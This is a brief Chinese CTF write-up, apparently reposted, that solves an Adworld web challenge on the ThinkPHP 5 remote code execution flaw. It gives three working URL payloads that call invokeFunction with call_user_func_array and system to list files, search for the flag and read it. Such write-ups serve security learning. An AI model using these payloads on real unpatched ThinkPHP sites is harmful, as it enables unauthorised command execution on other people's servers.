php_rce-攻防世界-web-ThinkPHP版本5的相关漏洞
生活随笔
收集整理的這篇文章主要介紹了
php_rce-攻防世界-web-ThinkPHP版本5的相关漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
題目是ThinkPHP版本5的相關漏洞
ThinkPHP5框架底層對控制器名過濾不嚴,可以通過url調用到ThinkPHP框架內部的敏感函數,進而導致getshell漏洞。
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
列出文件目錄;
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag”
沒有flag文件就搜一下;
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
打開flag文件
flag{thinkphp5_rce}
總結
以上是生活随笔為你收集整理的php_rce-攻防世界-web-ThinkPHP版本5的相关漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: parallel-comparator-
- 下一篇: SimpleRAR-攻防世界-Misc(